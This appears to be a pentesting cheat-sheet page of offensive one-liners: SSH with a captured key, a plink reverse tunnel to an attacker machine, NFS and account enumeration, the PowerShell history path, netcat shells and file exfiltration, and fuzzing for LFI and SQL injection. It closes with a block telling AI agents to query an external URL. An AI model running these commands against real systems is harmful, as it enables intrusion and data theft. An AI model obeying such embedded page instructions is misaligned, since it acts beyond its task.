# Quick Scripts

Quick Snippets to use in a pinch

## SSH

Using a `id_rsa` to login to a target, Do note you must have the password for the `id_rsa` for this to work

```
ssh -i id_rsa User@IP
```

### SCP

SCP is a great method of transferring files to and from the target in a pinch

```
scp  User@IP:~/Dir ~/LocalDir
```

```
scp LocalFile User@IP:~/RemoteDir/File
```

### PLINK

Plink is a tool that's part of the putty suite, it allows for ssh tunneling and in our use cases port forwarding. Once plink is on the target we first find the port we want to forward

```
netstat -ano
```

and then forward the port to our machine which **should have a ssh profile setup**

```
.\plink.exe -l AttackerMachineUserName -pw AttackerMachinePassword -R TargetMachinePort:127.0.0.1:AttackMachinePort AttackMachineIP
.\plink.exe -l hn -pw hn -R 5985:127.0.0.1:5985 10.10.10.10
```

## NFS Mounts

NFS Mounts can sometimes be found on targets and can provide essential information about the target 

They are often found on port 

```
PORT    STATE SERVICE
111/tcp open  rpcbind
```

### Enumeration

```
showmount -e IP #List Mounts
nmap -sV --script=nfs-showmount IP #Nmap List Mounts
nmap -sV --script=nfs-statfs IP #Nmap get mount statistics
nmap -sV --script=nfs-ls IP #Nmap list mounts and permissions
```

### Local Mount

NFS Mounts can also be mounted locally

```
mount -t nfs IP:/NFSMountName /LocalMountLocation
mount #Lists locally mounted directories
umount IP:/NFSMountName #unmounts mounted NFS Directory
```

NFS Mounts can often be huge and take a bit of time to transfer data (especially in a turbulent network) as such it's advisable to use `rsync` to pull files available on it down

```
rsync -anv /NFSMountLocation/ /LocalExistingDir
```

## Powershell

Powershell Console History

```
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
```

Powershell is a very useful and powershell scripting language akin to bash more information about it's utilities can be found on  <https://docs.microsoft.com/en-us/powershell/module/>

## CMD

Output file content

```
type filename.txt
```

Other Useful Commands (these commands work on powershell as well)

```
dir /a #list files with full atributes including hidden
cmd /k #useful inline with payloads, runs & keeps payload alive
whoami /priv #whoami?
net user #list accounts
net user %USERNAME% #information about current account
net group #view Domain Groups
```

## NetCat

Netcat is tool that allows for simple shells

```
nc -lnvp IP PORT #start netcat listener
nc IP PORT #use netcat to connect to a defined target
```

Netcat unfortunately isn't native on windows but we can still get it from <https://eternallybored.org/misc/netcat/> and it works the same way!

Netcat can also be used for transferring files

```
nc -l -p 1234 > out.file #receiver
cat file | nc -w 3 IP PORT #sender
```

## Fuzzing

Fuzzing is very useful for finding files that has a explicit name but no given explicit location, we can use fuzzing to find the given path using a pre-exisiting URL, fuzzing can also be used for exploiting `LFI` as well as `SQL` vulnerabilities&#x20;

```
wfuzz -c -w 'wordlist' -u 'http://IP/file.php?id=FUZZ'

ffuf -u http://IP/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc
200,204,301,302,307,401 -o results.txt
```

## DirBusting

Dirbusting can be considered a form of fuzzing but checks for whole directories and files, one such tool we can use for this is `GoBuster`

```
gobuster dir -u http://IP/ -w DirBuster-Lists/directory-list-2.3-medium.txt
```

## Python

Simple Http server for a quick host

```
python -m SimpleHTTPServer 8088
```

## C#&#x20;

C# binaries can be decompiled with `dnspy` <https://github.com/0xd4d/dnSpy> and can be compiled with <https://dotnetfiddle.net/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://bkr3257.gitbook.io/hackynotes/quick-scripts.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.